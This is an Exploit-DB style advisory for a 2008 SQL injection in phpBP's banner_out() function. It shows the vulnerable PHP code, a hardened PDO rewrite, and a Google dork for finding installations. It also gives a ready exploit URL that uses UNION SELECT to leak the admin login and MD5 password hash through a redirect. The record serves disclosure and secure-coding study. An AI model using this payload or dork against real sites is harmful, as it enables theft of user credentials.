Vendor: phpBP
By: irk4z
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: phpBP
Affected Version From: <= RC3 (2.204) FIX4
Affected Version To: <= RC3 (2.204) FIX4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in phpBP <= RC3 (2.204) FIX4. The banner_out() function in includes/functions/banners-external.php validates $_POST['id'] but interpolates the unvalidated $_GET['id'] directly into its SQL queries, so a specially crafted HTTP request can inject arbitrary SQL that the database then executes. This can be exploited to disclose the contents of the database, modify data, or obtain sensitive information such as user credentials.

Mitigation:

Upgrade to the latest version of phpBP.
Source

Exploit-DB raw data:

.-----------------------------------------------------------------------------.
|  vuln.: phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability        |
|  download: http://www.phpbp.com/                                            |
|  dork: "PHP BP Team"                                                        |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|                        --->    HACKBOX.pl    <---                           |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

 ./includes/functions/banners-external.php:
 ...
  function banner_out() // counts the number of clicks on a banner
  {
   global $conf;

   if($_GET['id'])
   {
    // Bug: the validation runs on $_POST['id'], but every query below uses $_GET['id']
    SQLvalidate($_POST['id']);

    $db = new dbquery;
    // $_GET['id'] is interpolated unquoted into the SELECT: this is the injection point
    $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__);

    if($db->num_rows()==0)
    {
     redirect('index.php?module=error?error=banners_error2');
     exit;
    }

    $d=$db->fetch_object();
    // The same unvalidated value, here inside single quotes
    $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__);

    // The selected row's url becomes the redirect target, which is how a UNION result reaches the client
    redirect($d->url);
   }

   exit;
  }
 ...
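The same function rewritten so that it validates the parameter it actually uses and binds it as an integer, as an added example (not phpBP's own code; it assumes PDO with a constructed in-memory SQLite table named after the snippet's `$conf[prefix]banners`, and the hypothetical name `banner_out_hardened`):

```php
<?php
// Added example, not phpBP's code: a hardened banner_out() that validates the
// input the queries use ($_GET['id']) and binds it through PDO prepared statements.
// Assumes an in-memory SQLite database with a constructed banners table; the
// snippet's dbquery class is not used.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE phpbp_banners (id INTEGER PRIMARY KEY, url TEXT, views INTEGER DEFAULT 0)");
$pdo->exec("INSERT INTO phpbp_banners (id, url) VALUES (7, 'https://example.com/')");

// Returns the redirect target, or null when the id is missing, malformed or unknown.
function banner_out_hardened(PDO $pdo, array $get, string $prefix = 'phpbp_'): ?string
{
    // Validate the SAME input the queries use; the original validated $_POST['id'] instead.
    // Only a positive integer is accepted, so "10000/**/LIMIT/**/0/**/UNION..." is rejected
    // before any SQL is built.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The table prefix comes from trusted configuration, never from the request; the id is bound.
    $table = $prefix . 'banners';
    $stmt = $pdo->prepare("SELECT url FROM {$table} WHERE id = :id");
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;   // unknown banner: the original redirects to its error page here
    }

    $upd = $pdo->prepare("UPDATE {$table} SET views = views + 1 WHERE id = :id");
    $upd->execute([':id' => $id]);
    return $row['url'];
}

// Constructed requests: a legitimate click and the injection string from the advisory above.
$requests = [
    'legitimate' => ['id' => '7'],
    'injection'  => ['id' => '10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,3/**/FROM/**/phpbp_users/*'],
];
foreach ($requests as $label => $get) {
    $target = banner_out_hardened($pdo, $get);
    echo $label . ': ' . ($target === null ? 'rejected, no redirect' : 'redirect to ' . $target) . PHP_EOL;
}
```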

# exploit:

http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*

you will be redirected to http://[login]_[md5_hash_pass] (ex. http://admin_21232f297a57a5a743894a0e4a801fc3/)

# milw0rm.com [2008-03-16]